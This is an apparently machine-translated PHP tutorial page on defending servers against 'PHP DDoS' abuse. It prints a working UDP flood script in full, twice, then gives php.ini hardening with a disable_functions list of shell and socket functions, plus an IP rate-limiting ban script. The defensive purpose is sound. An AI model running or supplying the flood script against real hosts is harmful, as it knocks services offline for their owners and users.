Detailed explanation of several defense methods for PHP DDos_PHP Tutorial

PHP DDos is a server that uses the configuration allow_url_fopen = On in the php.ini of my server. However, many websites need to use the allow_url_fopen function. Let me introduce to you some information about PHP DDos. A defense method

Let’s look at the php ddos ​​code first

The code is as follows

Copy code

代码如下

复制代码

$packets = 0; $ip = $_GET['ip']; $rand = $_GET['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET['time']; $time = time(); print "Flooded: $ip on port $rand "; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s n"; ?>

$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets /$exec_time, 2) . " packets/s n";
?>

Careful friends will find that fsockopen is a major attack function. Continuous connections and sending requests lead to excessive machine traffic and CPU, and the website cannot be accessed normally.

So I briefly studied the PHP DDos script structure and learned something. Here are some ways to avoid it to the greatest extent:

Note: The following operations are dangerous. Maxthon has nothing to do with any consequences, so please operate with caution.

1. Open php.ini

2. Disable dangerous functions

Since different programs have different function requirements, customers are asked to add or delete functions that need to be disabled.

代码如下	复制代码
phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open, proc_get_status,fsocket,fsockopen

Find disable_functions, remove the ";" in front, and add after the equal sign:

The code is as follows	Copy code
phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open, proc_get_status,fsocket,fsockopen

3. Set PHP execution timeout

If the program does not end but has reached the maximum execution time, it will be forced to stop. Please adjust the time as needed.

Find max_execution_time, remove the ";" in front, and add a positive integer after the equal sign in seconds, such as: 30

4. Disable PHP execution permissions in the upload directory

There are roughly three types of servers: IIS, Apache, and Nginx. I won’t write down the specific steps. Here is a link for your reference:

How to cancel directory script execution permissions with iis and apache: http://www.bKjia.c0m/sys/Windows/46232.htm

5. A very violent method

Directly prohibit PHP execution. The reason is that many sites can generate static web pages. Each time they are generated or managed, they have to manually turn on PHP execution permissions. Several users have already used this method. For specific methods, see method 4

6. Close the user center

For example, cms such as dede will have a user center, which has many places for uploading. This is probably the problem.

7. Modify the administrator directory

This method will not be discussed in detail, as it is not suitable for all programs.

8. Modify the default management account

Many people are accustomed to using: admin. However, if there is a loophole in the program, it is easy to guess the password of admin, so it is recommended to change admin to another login name.

9. A complex and memorable password

Whether it is a Windows/Linux system user or a website administrator account, you need to set a password that is difficult to guess, such as: 123hai@tang@.

Attach a PHP anti-DDoS attack code

The code is as follows

Copy code

//Query banned IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fileht))file_put_contents($fileht,""); $filehtarr=@file($fileht); if(in_array($ip."rn",$filehtarr))die("Warning:"." "."Your IP address are forbided by some reason, IF you have any question Pls emill to shop@mydalle .com!"); //加入禁止IP  $time=time();  $fileforbid="log/forbidchk.dat";  if(file_exists($fileforbid))  { if($time-filemtime($fileforbid)>60)unlink($fileforbid);  else{  $fileforbidarr=@file($fileforbid);  if($ip==substr($fileforbidarr[0],0,strlen($ip)))  {  if($time-substr($fileforbidarr[1],0,strlen($time))>600)unlink($fileforbid);  elseif($fileforbidarr[2]>600){file_put_contents($fileht,$ip."rn",FILE_APPEND);unlink($fileforbid);}  else{$fileforbidarr[2]++;file_put_contents($fileforbid,$fileforbidarr);}  }  }  }  //防刷新  $str="";  $file="log/ipdate.dat";  if(!file_exists("log")&&!is_dir("log"))mkdir("log",0777);  if(!file_exists($file))file_put_contents($file,"");  $allowTime = 120;//防刷新时间  $allowNum=10;//防刷新次数  $uri=$_SERVER['REQUEST_URI'];  $checkip=md5($ip);  $checkuri=md5($uri);  $yesno=true;  $ipdate=@file($file);  foreach($ipdate as $k=>$v)  { $iptem=substr($v,0,32);  $uritem=substr($v,32,32);  $timetem=substr($v,64,10);  $numtem=substr($v,74);  if($time-$timetem<$allowTime){  if($iptem!=$checkip)$str.=$v;  else{  $yesno=false;  if($uritem!=$checkuri)$str.=$iptem.$checkuri.$time."1rn";  elseif($numtem<$allowNum)$str.=$iptem.$uritem.$timetem.($numtem+1)."rn";  else  {  if(!file_exists($fileforbid)){$addforbidarr=array($ip."rn",time()."rn",1);file_put_contents($fileforbid,$addforbidarr);}  file_put_contents("log/forbided_ip.log",$ip."--".date("Y-m-d H:i:s",time())."--".$uri."rn",FILE_APPEND);  $timepass=$timetem+$allowTime-$time;  die("Warning:"." "."Sorry,you are forbided by refreshing frequently too much, Pls wait for ".$timepass." seconds to continue!");  }  }  }  }  if($yesno) $str.=$checkip.$checkuri.$time."1rn";  file_put_contents($file,$str);  ?>

相关教程 :

iis防止php ddos占完网络带宽与服务器资源解决方法

http://www.bkjia.com/PHPjc/632837.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/632837.htmlTechArticlePHP DDos是一种利用服务器就是利用我服务器的php.ini中配置allow_url_fopen = On才得成了，但allow_url_fopen 这个功能很多网站都需要使用，下面我来...